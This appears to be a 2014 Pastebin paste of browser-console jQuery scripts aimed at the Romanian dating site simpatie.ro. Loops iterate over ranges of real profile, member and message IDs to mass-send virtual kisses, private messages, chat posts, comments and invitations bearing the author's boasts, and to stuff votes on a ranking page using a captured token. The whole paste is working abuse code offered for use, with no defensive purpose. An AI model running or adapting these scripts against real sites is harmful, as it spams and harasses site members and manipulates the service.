robixxu

[Script] Messing with ajax #1 ~ simpatie.ro

May 8th, 2014
235
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Me: 930799
  2. index.php?page=favourities&action=add&profile_id=876445
  3.  
  4. index.php?page=send_vkiss&profile_id=
  5.  
  6. for(var i=252325;i<274325;i++){
  7.     $.get("index.php?page=send_vkiss&profile_id="+i,function(data){ });
  8. }
  9.  
  10.  
  11. http://www.simpatie.ro/index.php?page=chat
  12. message=gigel
  13.  
  14.  
  15. for(var i=0;i<3000;i++){
  16.     $.post("index.php?page=chat",{
  17.         message:i+"> robiXxu made me"
  18.     },function(data){
  19.     });
  20. }
  21.  
  22.  
  23.  
  24.  
  25. http://www.simpatie.ro/index.php?page=send_message&action=send&profile_id=383786&start=&q=
  26.  
  27.  
  28. rid=404626&subject=hello&message=TEst
  29.  
  30.  
  31. for(var i=352943;i<353943;i++){
  32. $.post("index.php?page=send_message&action=send&profile_id=930799&start=&q=",{
  33.         rid: i,
  34.         subject:"Salut",
  35.         message:"robiXxu is my HERO >:)"
  36.     },function(data){
  37.     });
  38. }
  39.  
  40.  
  41. comment.php
  42. mid=26329&comentariu=aa
  43.  
  44.  
  45. for(var i=26329;i<28329;i++){
  46. $.post("comment.php",{
  47.         mid: i,
  48.         comentariu:"robiXxu is my HERO >:)"
  49.     },function(data){
  50.     });
  51. }
  52.  
  53.  
  54.  
  55. for(var i=351477;i<354477;i++){
  56.     $.get("invita.php?member_id="+i,function(data){ });
  57. }
  58.  
  59.  
  60. PUBLIC CHAT
  61.  
  62. POST
  63. http://www.simpatie.ro/index.php?page=public&id=439146
  64.  
  65. message=a
  66.  
  67.  
  68. for(var i=0;i<300;i++){
  69. $.post("index.php?page=public&id=439146",{
  70.         message:i+"> robiXxu is my HERO >:)"
  71.     },function(data){
  72.     });
  73. }
  74.  
  75.  
  76.  
  77.  
  78.  
  79. BEST
  80.  
  81. /index.php?page=best&yes=930799&no=576250&token=308a332ce77bc063459d0ccfe5fd3cf1
  82.  
  83. for(var i=576250;i<580250;i++){
  84.     $.get("index.php?page=best&yes=930799&no="+576250+"&token=308a332ce77bc063459d0ccfe5fd3cf1",function(data){ });
  85. }
Advertisement
Add Comment
Please, Sign In to add comment